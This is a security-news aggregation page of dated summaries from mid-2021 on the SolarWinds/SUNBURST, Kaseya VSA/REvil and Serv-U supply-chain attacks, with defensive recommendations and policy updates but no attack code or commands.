Go to listing page

Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More

Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More

Share Blog Post

An alleged Russia-backed hacking group is believed to have targeted and breached the U.S. Departments of Treasury and Commerce. According to Reuters, the breach originated from a supply chain attack that leveraged Orion - the widely-used network monitoring tool from SolarWinds, an IT company that supports several federal agencies and the U.S. military. Last week, cybersecurity company FireEye had reported a similar attack carried out via the SolarWinds platform that led to the compromise of its “red teaming” tools. It is believed that a large number of organizations that use this software might be at risk. The malware used in this widespread "UNC2452" campaign is being tracked by several names including Solorigate and SUNBURST.

Cyware has created this resource to collect and share live alerts on this campaign, impacted organizations as reported in the media, indicators of compromise (IOCs), and other relevant threat intelligence. We are actively working to keep this page updated and accurate in order to ensure that it is timely and relevant to as many people as possible.

Solutions and Countermeasures


Advisories

Indicators of Compromise (IOCs)

Threat Response Workflow

Killswitch 

Network Auditing Tool

_______________________________________________________________________________________

(July 27, 2021)


How network segmentation can protect supply chains from ransomware attacks

Network segmentation has proven helpful in mitigating common ransomware attacks especially those arising from breached IoT devices, third-party vendors, and the like. Part of this has to do with the main benefits of network segmentation. It eliminates network congestion, resulting in overall improved performance, and improves intrusion control by making it easy to contain detected threats. Moreover, it minimizes access to specific sensitive data and information by zoning them to a more secure network.


_______________________________________________________________________________________

(July 26, 2021)


Why code signing best practices are vital to hardening security?

Code signing, and the process of establishing and ensuring trust, has become more critical alongside the growing reliance on software that users purchase from third-party vendors and build and deploy within their own organizations using everything from PowerShell and Bash scripts to containers, libraries, files, and executables.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 26, 2021)


When software updates get hacked

The attack against Kaseya — attributed to the Russia-linked REvil ransomware-as-a-service (RaaS) group — is part of a trend of cybercriminals and espionage operators targeting the suppliers of administrative software used by companies to manage their environments.

Ref - Dark Reading 

_______________________________________________________________________________________

(July 23, 2021)


Supply-chain threats and client-side vulnerabilities

The software supply chain attacks that target applications are growing in large part because the attack surface for these threats has exploded. And that is the result of the latest trends in app development. Evolving client-side app protection technologies are an important factor in reducing cyber risk.

Ref - Barracuda 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya Ransomware attack explained

REvil attacked Kaseya’s VSA SaaS platform using zero-day exploits to gain access and distribute malicious software to their customers and their systems. From there, the ransomware gang began using weaknesses on those systems to encrypt everything. Since the malware is already wrapped in the platform, it’s been signed by Kaseya’s platform. As a result, the malware is getting past everything on these client’s systems.

Ref - PurpleSec

_______________________________________________________________________________________

(July 23, 2021)

The lessons to be learned from the Colonial Pipeline attack

The Colonial Pipeline attack – coupled with the backlash in the wake of both the SolarWinds and Codecov attacks – has led many to wonder if the executive order is enough. This unease has prompted top executives from firms like Microsoft, Amazon and Cisco to call for an international coalition to combat the global increase in ransomware.

Ref - TechRadar 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya gets master decryptor to help customers still suffering from REvil attack

Kaseya said it has obtained a decryptor that should successfully restore data encrypted during the Fourth of July weekend attack. Kaseya spokeswoman Dana Liedholm described the source of the decryptor as a trusted third party, declining to elaborate or comment on whether a ransom was paid.


_______________________________________________________________________________________

(July 23, 2021)

Getting ahead of supply-chain risks

Supply chains have become so global has created new risk in terms of the reliability and the availability of certain things. To make sure that these supply chains are properly managed, it’s important to understand where the risk is, getting ahead of it, and anticipating security needs and addressing them before they become problems.

Ref - McKinsey 

_______________________________________________________________________________________

(July 22, 2021)

Tracking the trail of software: The key to boosting security

There is an emerging set of best practices that Google and other software companies have developed in collaboration with the U.S. government to help deliver more secure software. The key is to be able to ensure a ‘certified and known’ good version of the software at any given time, down to the very smallest component code.

Ref - Forbes 

_______________________________________________________________________________________

(July 22, 2021)

DevSecOps: The key to securing supply chain in a multi-cloud threatscape

DevSecOps is all about: leveraging your CI/CD platform and containers, increasing testing and scanning across the SDLC, and minimizing manual security measures with AI/ML. Businesses that employ a DevSecOps framework will not only bolster breach prevention, they will add business value as they deliver safer products and services that better protect their businesses and customers.

Ref - InfoQ

_______________________________________________________________________________________

(July 22, 2021)


Things that changed after the SolarWinds attack

One of the most significant impacts of the SolarWinds attack has been that cybersecurity is finally getting the attention it deserves at the highest levels of the U.S. government. It is spurring real changes in policy and actions among the public and private sectors. Organizations must take the lessons learned from this attack seriously and quickly move to improve resiliency and strengthen their own cybersecurity practices.

Ref - Trustwave 

_______________________________________________________________________________________

(July 22, 2021)

Who is responsible for improving security in the software development environment?

Venafi announced the findings of a global survey that evaluates the impact of software supply chain attacks like SolarWinds/SUNBURST, CodeCov, and Kaseya/REvil on how development organizations are changing their approach to securing software build and delivery environments.


_______________________________________________________________________________________

(July 21, 2021)


New bill would make some companies report cyberattacks to the government

A new bill unveiled Wednesday would make some companies tell the government when they’ve been hacked. The bipartisan Cyber Incident Notification Act is a response to the recent attacks on SolarWinds, which impacted government agencies, and Colonial Pipeline, which disrupted access to fuel across a large region of the country. Since then, ransomware attacks — where hackers encrypt files until a victim pays a ransom — have proliferated.

Ref - CNBC 

_______________________________________________________________________________________

(July 21, 2021)

Following SolarWinds & Colonial hacks, a new Bipartisan Cyber Reporting Bill introduced

A new bipartisan Cyber Incident Notification Act of 2021 would require federal government agencies, federal contractors, and critical infrastructure operators to notify the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) when a breach is detected. With this, the U.S. government can mobilize to protect critical industries across the country.

Ref - Senate.gov 

_______________________________________________________________________________________

(July 21, 2021)

A risk management cybersecurity imperative for State, Local & Tribal Governments

The cyber-attack using the SolarWinds vulnerability raised alarms throughout the federal government as many agency networks data were presumably compromised. The extent of the damage from Solar Winds (and other recent breaches) is still being investigated and mitigated. The cyber breach not only impacted federal systems, but also the state, local, and Tribal governments (SLTG) and databases.

Ref - Forbes 

_______________________________________________________________________________________

(July 20, 2021)

Why securing against IT supply chain attacks is crucial

Given the prevalence of the software being targeted in the supply chain attacks, it’s more about securing any company’s internal environment from supply chain attacks, rather than securing the supply chain itself. As attacks against these building blocks increasingly become a key part of threat actors’ playbook, taking proper steps to secure the enterprise’s IT supply chain is crucial to maintaining an effective cybersecurity program.

Ref - Medium 

_______________________________________________________________________________________

(July 20, 2021)

Top 5 things to know about supply chain attacks

There are 5 key things to know about supply chain attacks. It doesn’t attack the victims directly, but it targets its suppliers. It can affect almost any industry, including Financial, energy, manufacturing, transportation. It may or may not involve either hardware or the internet. Attackers often try to compromise open source development or distribution to gain a foothold in companies. Moreover, there are several possible ways to safeguard against such threats.

Ref - TechRepublic 

_______________________________________________________________________________________

(July 19, 2021)


How to prevent supply chain attacks by securing DevOps

With threat actors focusing more intently on supply chain attacks, building security into the development process becomes mission-critical. Software developers need to embrace DevSecOps to prevent their applications from being used in a supply chain attack. They can do this by creating standards that ensure coding best practices, especially when third-party code is involved.


_______________________________________________________________________________________

(July 19, 2021)

Biden Administration blames hackers tied to China for Microsoft cyberattack spree

The Biden administration publicly blamed hackers affiliated with China’s main intelligence service for a far-reaching cyberattack on Microsoft Corp. email software this year, part of a global effort by dozens of nations to condemn Beijing’s malicious cyber activities. The U.S. government has high confidence that hackers tied to the Ministry of State Security, or MSS, carried out the unusually indiscriminate hack of Microsoft Exchange Server software that emerged in March, senior officials said.


_______________________________________________________________________________________

(July 19, 2021)

Breaking down the threat of going all-in with Microsoft security

Recent cyber events over the last several months have highlighted a critical need for enterprises to break free from depending on one vendor for security to limit risk. Having an unsegmented body of the ship means it would be prone to sinking very quickly when damaged. On the other hand, companies that segment their security infrastructure with multiple vendors are like ships with several compartments. When one area is compromised, the whole ship isn't immediately exposed.

Ref - Darkreading 

_______________________________________________________________________________________

(July 19, 2021)

Kaseya ransomware attack FAQ

According to Kaseya CEO Fred Voccola, less than 0.1% of the company's customers were embroiled in the breach -- but as their clientele includes MSPs, this means that smaller businesses have also been caught up in the incident. Present estimates suggest that 800 to 1500 small to medium-sized companies may have experienced a ransomware compromise through their MSP.

Ref - ZDNet 

_______________________________________________________________________________________

(July 18, 2021)

Password attacks on Microsoft highlight the need for Passwordless Zero Trust Systems

President Biden, the National Security Agency, and the Department of Defense have all made major public statements encouraging companies to move from traditional perimeter defense-based systems to Zero Trust systems. The policy is shifting for federal contractors such that Zero Trust is quickly becoming not just an option, but the regulation standard. Other industries must follow suit to protect their financial interests, intellectual property, and reputations.


_______________________________________________________________________________________

(July 17, 2021)

CloudFlare CDNJS bug could have led to widespread supply-chain attacks

Web infrastructure and website security company Cloudflare last month fixed a critical vulnerability in its CDNJS library that's used by 12.7% of all websites on the internet. The weakness concerned an issue in the CDNJS library update server that could potentially allow an attacker to execute arbitrary commands, leading to a complete compromise


_______________________________________________________________________________________

(July 16, 2021)

Several security pros not confident about supply chain attack security - Report

According to a new report from machine identity management firm Venafi, many security pros aren't confident they could repel a major supply chain attack. Polling more than 1,000 information security professionals, developers, and executives in the IT and software development industries for the report, Venafi found that almost half (48%) believe security teams are responsible, with the exact percentage also saying their development teams are responsible.


_______________________________________________________________________________________

(July 16, 2021)

Kaseya attack - How to fight this unique attack technique

Kaseya attack is different from other usual ransomware attacks. It started with a zero-day, and that's unusual. It's hard to say best practice in terms of avoiding this. Moreover, the companies that were infected, were following best practices. There were some mistakes like the platform being used shouldn't have been exposed to the internet. It was mostly exposed so that people could remote work because of the pandemic and to make more online availability. And it looks like that there was an overuse of what are called endpoint protection exclusions.


_______________________________________________________________________________________

(July 15, 2021)

With software supply chain attacks escalating, who is responsible for increasing security

According to Venafi’s survey, respondents nearly unanimously agree (97%) that the techniques and procedures used to attack the SolarWinds software development environment will be reused in new attacks this year. Despite this certainty, there is no alignment between security and development teams on which team should be responsible for improving security in the software build and distribution environments.

Ref - Yahoo

_______________________________________________________________________________________

(July 15, 2021)

iOS zero-day let SolarWinds hackers compromise fully updated iPhones

The Russian state hackers who orchestrated the SolarWinds supply chain attack last year exploited an iOS zero-day as part of a separate malicious email campaign aimed at stealing Web authentication credentials from Western European governments. Attacks targeting CVE-2021-1879, as the zero-day is tracked, redirected users to domains that installed malicious payloads on fully updated iPhones.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 14, 2021)

Targeted attack activity heightens need for firms to patch new SolarWinds flaw

Organizations that have not yet patched against a critical remote code execution vulnerability disclosed this week in SolarWinds' Serv-U file transfer technology for Windows might want to do so quickly. Microsoft is presently tracking the attacker as DEV-0322. The group has used commercial VPN technologies and compromised consumer routers in previous attack activities.

Ref - Darkreading 

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers threat actor targeting SolarWinds software

Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft

_______________________________________________________________________________________

(July 13, 2021)

Identity administration platform may be the weak link post-RMM supply-chain attack

Recent ransomware attacks that used a compromised Remote Monitoring and Management (RMM) platform to access and push the malicious executables to endpoints are forcing security teams to re-evaluate such centralized platforms with very large blast radius. Such issues have again shown the need for the organizations to move to infrastructure designed with Zero-trust principles in mind.

Ref - Medium

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers critical SolarWinds zero-day under active attack

An attacker can gain privileged access to exploited machines hosting Serv-U products and could then install programs; view, change or delete data; or run programs on the affected system. The vulnerability exists in the latest Serv-U version 15.2.3 HF1, released on May 5, and all prior versions.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 12, 2021)

SolarWinds patches critical Serv-U vulnerability exploited in the wild

SolarWinds is urging customers to patch a Serv-U remote code execution vulnerability exploited in the wild. According to SolarWinds, "if SSH is not enabled in the environment, the vulnerability does not exist." SolarWinds has addressed the security vulnerability reported by Microsoft with the release of Serv-U version 15.2.3 hotfix (HF) 2.


_______________________________________________________________________________________

(July 12, 2021)

SolarWinds confirms new zero-day flaw under attack

In a recent advisory, SolarWinds said a single threat actor exploited security flaws in its Serv-U Managed File Transfer and Serv-U Secure FTP products against a limited, targeted set of customers. This zero-day is new and completely unrelated to the SUNBURST supply chain attacks.

Ref - SecurityWeek 

_______________________________________________________________________________________

(July 11, 2021)

JustTech and its clients impacted in Kaseya supply-chain ransomware attack

JustTech disclosed that the company and its clients were victims of the recent cyber-attack that has been reportedly attributed to a criminal gang in Russia known as REvil. For JustTech, it is believed the cyber-attack began at 12:31 PM Eastern Standard Time on Friday, July 2nd. JustTech discovered the breach, disabled, and shut down the affected servers within 8 minutes.

Ref - JustTech 

_______________________________________________________________________________________

(July 9, 2021)

Securing the supply chain: Lessons learned from the Codecov compromise

Rapid7 researchers provided the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins, Bamboo, etc., and version control systems, such as GitHub, GitLab, etc. It covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.

Ref - Rapid7
 
_______________________________________________________________________________________

(July 9, 2021)

SolarWinds Serv-U remote memory escape vulnerability

SolarWinds was recently notified by Microsoft of a security vulnerability (CVE-2021-35211) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. Microsoft’s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor.

Ref - Solarwinds 

_______________________________________________________________________________________

(July 8, 2021)

Kaseya left its customer portal vulnerable to a 2015 flaw in its own software

On July 3, security incident response firm Mandiant notified Kaseya that their billing and customer support site —portal.kaseya.net — was vulnerable to CVE-2015-2862, a “directory traversal” vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser. As its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya’s customer portal was still exposed to the data-leaking weakness.


_______________________________________________________________________________________

(July 8, 2021)

FERC and NERC publish a whitepaper on SolarWinds and related supply chain compromise

On July 6, 2021, the staff of the FERC and the NERC E-ISAC issued a whitepaper entitled ““SolarWinds and Related Supply Chain Compromise – Lessons for the North American Electricity Industry.” The whitepaper describes these major supply chain-related cybersecurity events and the key actions to take to secure systems.

Ref - JD Supra 

_______________________________________________________________________________________

(July 8, 2021)

NJCCIC recommendations on widespread supply chain ransomware attack

The NJCCIC recommends MSPs using VSA follow the guidance from Kaseya and disconnect VSA servers until notified by Kaseya that it is safe to connect them after an update is applied to remediate the exploited vulnerability. A tool to scan systems for signs of exploitation is available and the incident overview and technical details are also provided by Kaseya on their website.

Ref - NJCCIC 

_______________________________________________________________________________________

(July 8, 2021)

Analyzing Supply Chain Attacks

While software vulnerabilities still play a role in breaching organizations’ defenses, the software supply chain introduces an inordinate degree of new opportunities to introduce malicious artifacts and to execute unauthorized activities from within. It is important to note that malware is not a vulnerability, so it can neither be detected nor resolved using the same methods.

Ref - AquaSec 

_______________________________________________________________________________________

(July 8, 2021)

Global ransomware supply-chain attack takes a small Maryland town offline

Leonardtown, a town in Maryland, had been a victim of the massive ransomware attack that breached a popular software made by the information technology company Kaseya. The attack reached Leonardtown through its IT management company, JustTech, which uses the affected Kaseya product.


_______________________________________________________________________________________

(July 7, 2021)

REvil Ransomware Attack on Kaseya VSA - Detailed technical analysis

Unlike previous attacks by REvil where the dwell time was very long and data was carefully exfiltrated prior to detonating ransomware, this attack appears to have happened very quickly. It appears that the threat actors knew they were racing against the development of a patch. Security researcher Victor Gevers and the team at DIVD.nl disclosed the vulnerability to Kaseya and had been working with them on a patch, but REvil beat them to the punch.

Ref - Varonis 

_______________________________________________________________________________________

(July 7, 2021)

Analyzing the REvil Ransomware attack

In the recent attack on Kaseya, the ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server platform. Security researchers have identified three zero-day vulnerabilities potentially used in attacks against their clients, including Authentication Bypass Vulnerability, Arbitrary File Upload Vulnerability, and Code Injection Vulnerability.

Ref - Qualys 

_______________________________________________________________________________________

(July 7, 2021)

The massive Kaseya ransomware attack - Key things to know and learn

The attack on Kaseya points to a popular target for ransomware attackers: Managed Service Providers. MSPs such as Kaseya's customers allow companies to outsource certain software and services, such as IT management, to third parties, which can help avoid the cost of having to employ such experts in-house.

Ref - CNN 

_______________________________________________________________________________________

(July 7, 2021)

In the Kaseya supply chain ransomware attack, history repeats itself

Though details of the recent international ransomware campaign (via Kaseya) are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.

Ref - CyberArk 

_______________________________________________________________________________________

(July 7, 2021)

Deconstructing the REvil Ransomware attack on Kaseya VSA

After gaining access to VSA, the attackers created a fake malicious automated update called “Kaseya VSA Agent Hot-fix,” then pushed it to VSA servers in Kaseya’s clients’ networks. Kaseya VSA administrative access was disabled to the compromised servers and the notorious REvil (aka Sodinokibi) ransomware was delivered to other machines in their networks.


_______________________________________________________________________________________

(July 7, 2021)

Kaseya VSA ransomware attack, SolarWinds hack share many similarities

Last weekend’s Kaseya VSA supply chain ransomware attack and last year’s giant SolarWinds hack share a number of similarities. The attacks on Kaseya and SolarWinds share the most “sinister point” of compromise. That’s the trust between a vendor and a client. Key among the differences, however, is that the exploit of the Kaseya VSA product led to the injection of ransomware into the endpoints managed by Kaseya VSA on-premises users, while the SolarWinds attack led to data exfiltration.


_______________________________________________________________________________________

(July 7, 2021)

REvil ransomware gang’s major supply chain attack may affect over 1,500 customers

Although it was initially believed that only 50 companies using VSA on-premises were targeted by REvil, the evolving situation reveals more potential victims as numbers climb to the tune of 1,500-2,000 companies likely exposed to downstream impact by this major attack. The number of potential victims can be so much larger because Kaseya’s customers themselves are MSPs who serve a customer base of their own.


_______________________________________________________________________________________

(July 6, 2021)

The key lessons from Kaseya cyber attack

The solution to the Kaseya attack is more than detection and protection. It requires policy, regulations, law enforcement, diplomacy, criminal ecosystem disruption, and reducing the benefit of the crime.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers breached RNC via Synnex in a new attack

The Russian government hackers behind the SolarWinds campaign breached the computer systems of the Republican National Committee through Synnex in a new attack. There is no indication, however, that the RNC itself was hacked or that any RNC information was stolen.

Ref - CRN 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya ransomware: a software supply chain attack or not?

The newly discovered vulnerability, initially known only to the attackers, allowed them to exploit the on-premise version of the Kaseya software, and ultimately conduct the ransomware attack. And, because so many of Kaseya's customers are MSPs, the attackers were able to pass the ransomware attack downstream to as many as 1,500 small and medium-size businesses that outsource everyday IT functions.

Ref - Sonatype 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya says it's seen no sign of a supply chain attack

Kaseya has said it’s been unable to find signs its code was maliciously modified and offered its users a ray of hope with the news that it is testing a patch for its on-prem software and is considering restoring its SaaS services on Tuesday.


 _______________________________________________________________________________________

(July 6, 2021)

How can a business ensure the security of its supply chain?

The reality is that supply chain attacks are not going away. In the first quarter of 2021, 137 organizations reported experiencing supply chain attacks at 27 different third-party vendors, while the number of supply chain attacks rose 42% from the previous quarter. Therefore, it becomes important for businesses to mitigate risk when it comes to the increased threat from supply chain attacks.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers still targeting Microsoft, focus on support staff

Microsoft's Threat Intelligence Center's investigation detected information-stealing malware on a machine belonging to one of Microsoft's customer support agents with access to basic account information for a small number of our customers. The actor used this information in some cases to launch highly targeted attacks as part of their broader campaign.


_______________________________________________________________________________________

(July 6, 2021)

Kaseya supply chain ransomware attack - Technical analysis

The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypts files on the affected systems.

Ref - ZScaler
 
_______________________________________________________________________________________

(July 6, 2021)

Ransomware group connected to JBS incident thought to be behind massive MSP supply chain attack

While most Americans were preparing for the July 4 holiday weekend by picking up burgers and beers, the hackers thought to be responsible for the JBS ransomware incident were readying a supply chain attack timed to hit when IT workers were off duty. An attack on managed service providers (MSPs) making use of Kaseya products is thought to have compromised at least 200 of that company’s clients, and possibly as many as tens of thousands in total.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 5, 2021)

New supply chain ransomware attack targets

The sophisticated supply-chain ransomware attack targeting Kaseya initially leveraged a vulnerability in the Kaseya VSA software to gain access to victim organizations and then used REvil’s RaaS to infect those organizations with ransomware. Reports claim that a malicious update was deployed to the Kaseya VSA interface by the threat actors as an update or hotfix for the Kaseya VSA agent.

Ref - Fortinet 

_______________________________________________________________________________________

(July 5, 2021)

Kaseya crippled by supply chain attack

REvil compromised Kaseya VSA servers and is currently using them to deploy and distribute their ransomware. The ransomware encryptors are contained in the file agent.exe. When this file is activated, both an old yet legitimate copy of Windows Defender MsMpEng.exe, and the encryptor payload mpsvc.dll. are dropped into the C:\Windows path to DLL sideload - a process where a malicious DLL file is loaded in place of a legitimate one.

Ref - Upguard 

_______________________________________________________________________________________

(July 5, 2021)

Real-time prevention of the Kaseya VSA supply chain REvil ransomware attack

In the Kaseya attack, most of the attacked endpoints were Windows servers. This attack is particularly evasive because all the attack chain components are signed with digital certificates, starting from the Kaseya process, continuing with a vulnerable Microsoft Defender process, and ending with the side-loaded signed ransomware.

Ref - Morphisec 

_______________________________________________________________________________________

(July 5, 2021)

Over 1000 organizations globally attacked on Fourth of July weekend, biggest supply chain attack since Sunburst

To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack. 

Ref - CheckPoint

_______________________________________________________________________________________

(July 5, 2021)


US spy agencies investigate Kaseya supply chain attack

President Biden has ordered his intelligence agencies to investigate a major ransomware supply chain attack over the weekend that targeted a vendor of IT software used by managed service providers (MSPs). Suspected to be the work of a REvil affiliate, the attack on Miami-headquartered Kaseya was spotted by its incident response team at around midday on Friday.


_______________________________________________________________________________________

(July 5, 2021)

Hackers’s sophisticated ransomware attack targeted a flaw in IT management

The hackers behind a mass ransomware attack exploited multiple previously unknown vulnerabilities in IT management software made by Kaseya Ltd., the latest sign of the skill and aggressiveness of the Russia-linked group believed responsible for the incidents.

Ref - Fortune 

_______________________________________________________________________________________

(July 5, 2021)


IT for Kaseya defers decision about SaaS restoration after supply chain attack

IT management software provider Kaseya has deferred an announcement about the restoration of its SaaS services, after falling victim to a supply chain attack that has seen its products become a delivery mechanism for the REvil ransomware. On learning of the attack, Kaseya urged customers to pull the plug on their VSA servers, because the attack shuts off administrator access to the suite. The company also shuttered its SaaS services as a precautionary measure.

Ref - The Register 

_______________________________________________________________________________________

(July 4, 2021)

Guidance for MSPs and their customers affected by the Kaseya VSA supply-chain

CISA and FBI recommend MSP customers affected by the Kaseya VSA supply-chain attack take immediate action to implement cybersecurity best practices. They are recommended to download and use the Kaseya VSA Detection Tool. Agencies also recommend enabling and enforcing multi-factor authentication (MFA) on every single account that is under the control of the organization.

Ref - US Cert 

_______________________________________________________________________________________

(July 4, 2021)

Kaseya supply chain attack targeting MSPs to deliver REvil ransomware

The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.

Ref - TrueSec

_______________________________________________________________________________________

(July 4, 2021)

How Russian spies hacked the Justice, State, Treasury, Energy and Commerce Departments

The Department of Homeland Security spent billions on a program called "Einstein" to detect cyber attacks on government agencies. The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.

Ref - CBS News 

_______________________________________________________________________________________

(July 4, 2021)

Independence Day: REvil uses supply chain exploits to attack hundreds of businesses

REvil’s operators posted to their “Happy Blog”, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, but under the condition that they need to be paid $70,000,000 worth of BitCoin.

Ref - Sophos 

_______________________________________________________________________________________

(July 4, 2021)

How U.S. cyber policy changed after SolarWinds

Since the disclosure of SolarWinds attacks and since the formation of the new government in the United States, several things have changed in the cybersecurity world. The Biden Administration imposed sanctions on Russia, ordered new cybersecurity standards for federal contracts with software companies, and chose the nation's first National Cyber Director.

Ref - CBS News 

_______________________________________________________________________________________

(July 3, 2021)

Kaseya ransomware supply chain attack: Key things to know

Several hundred organizations have been targeted by the REvil (aka Sodinokibi) ransomware in a supply chain attack involving Kaseya VSA software and multiple Managed Service Providers (MSPs) who use it. REvil attacks are usually financially motivated. However, there are some signs that the attacks may be politically motivated disruption.

Ref - Symantec

_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack hits nearly 40 service providers

Threat actors behind the notorious REvil cybercrime operation appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide, in what's an instance of a widespread supply-chain ransomware attack. Following the incident, the IT and security management services company said it took immediate steps to shut down its SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised.


_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply?chain attack: What we know so far

Kaseya IT management software, commonly used in Managed Service Provider (MSP) environments, had been hit by another in a series of supply-chain hacks. As with the SolarWinds incident, this latest attack uses a two-step malware delivery process sliding through the back door of tech environments. The cybercriminals behind this attack apparently had monetary gain rather than cyber espionage in their sights, eventually planting ransomware while exploiting the trust relationship between Kaseya and its customers.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware gang executes supply chain attack via malicious Kaseya update

The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions and is using a malicious update for the VSA software to deploy ransomware on enterprise networks.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware hits 1,000+ companies in MSP supply-chain attack

Researchers are tracking 20 MSPs where Kaseya VSA was used to encrypt over 1,000 businesses and are working in close collaboration with six of them. They have proof that their customers are being encrypted as well. Kaseya issued a security advisory on their help desk site, warning all VSA customers to immediately shut down their VSA server to prevent the attack's spread while investigating.


_______________________________________________________________________________________

(July 2, 2021)

Kaseya VSA Supply-Chain Ransomware Attack

CISA is taking action to understand and address the recent supply-chain ransomware attack against Kaseya VSA and the multiple managed service providers (MSPs) that employ VSA software. CISA encourages organizations to review the Kaseya advisory and immediately follow their guidance to shut down VSA servers.

Ref - US Cert 

_______________________________________________________________________________________

(July 2, 2021)

Improve supply chain security with intelligence from surface, deep & dark web

In the past several months, the SolarWinds attack and the subsequent fallout have forced organizations to reexamine their supply chain security approach. Mitigating the supply chain threats involves a blended approach that includes secure development processes, vulnerability scanning and management, and endpoint security alongside effective vendor governance practices.


_______________________________________________________________________________________

(July 1, 2021)

Kaseya VSA supply-chain ransomware attack -Sophos report

Sophos said that the supply chain attack that uses Kaseya to deploy a variant of the REvil ransomware into a victim’s environment is geographically dispersed. It appears that the attackers used a zero-day vulnerability to remotely access internet-facing VSA Servers.

Ref - Sophos

_______________________________________________________________________________________

(June 30, 2021)

11 Tactics to prevent supply chain attacks

To prevent supply chain attacks, organizations can follow these strategies. They are required to implement Honeytokens, secure Privileged Access Management, and implement a Zero Trust Architecture. They should prepare for security by assuming that they will be attacked for sure.

Ref - Upguard 

_______________________________________________________________________________________

(June 29, 2021)

Improving the security of your supply chain through integration

To counter the threat of a supply chain incursion, companies are well served by the latest generation of highly specialized threat intelligence solutions. Take a breach and attack simulation (BAS) tool like Cymulate for example. BAS solutions can help reduce supply chain risk by conducting ongoing, automated penetration testing. They identify vulnerabilities by mimicking the tactics used by bad actors and showing you where you’re most exposed.

Ref - Mimecast 

_______________________________________________________________________________________

(June 29, 2021)

Zero-Trust doesn’t mean zero breaches

The detailed and specific answer to any particular breach depends on the actual mechanism incorporated for the initial infection and/or propagation. In the case of SolarWinds, the initial infection threat vector is unknown. Its dissemination technique, on the other hand, is as public as it is horrifying: the previously trusted software supply chain.

Ref - Forrester 

_______________________________________________________________________________________

(June 29, 2021)

Denmark's central bank exposed in SolarWinds hack

Denmark's central bank was compromised in last year's global SolarWinds hacking operation, leaving a "backdoor" to its network open for seven months. A backdoor stood open at the Danish central bank for seven months until it was discovered by U.S. security firm Fire Eye, Version2 said, citing various documents it obtained under a freedom of information request, such as SolarWinds emails.

Ref - Reuters 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies an average of $12 million

A recent ‘2021 Cybersecurity Impact Report’ from IronNet has revealed some interesting facts about Solarwinds attacks. The report is based on interviews with 473 security IT decision-makers from the U.S., U.K., and Singapore who work in the technology, financial, public service, and utility sectors. The survey found that 90% of respondents said their security posture had improved over the last two years, but 86% suffered attacks severe enough to require a meeting of the companies' C-level executives or boards of directors.


_______________________________________________________________________________________

(June 28, 2021)


Some UW institutions used software compromised by Russian hackers - US Officials

Email records show University of Wisconsin System cybersecurity staff raced to determine whether any of its 26 campuses or central office had been impacted by the global SolarWinds hacking incident discovered in December 2020. According to documents, some UW institutions were running the compromised software, though it's unclear whether attackers stole information or disrupted university networks.

Ref - WPR.org 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds hackers continue the assault with a new Microsoft breach

The Nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker’s computer and used the access to launch targeted attacks against company customers. The hacking group also compromised three entities using password-spraying and brute-force techniques, which gain unauthorized access to accounts by bombarding login servers with large numbers of login guesses.

Ref - Wired 

_______________________________________________________________________________________

(June 28, 2021)


Microsoft says new breach discovered in probe of suspected SolarWinds hackers

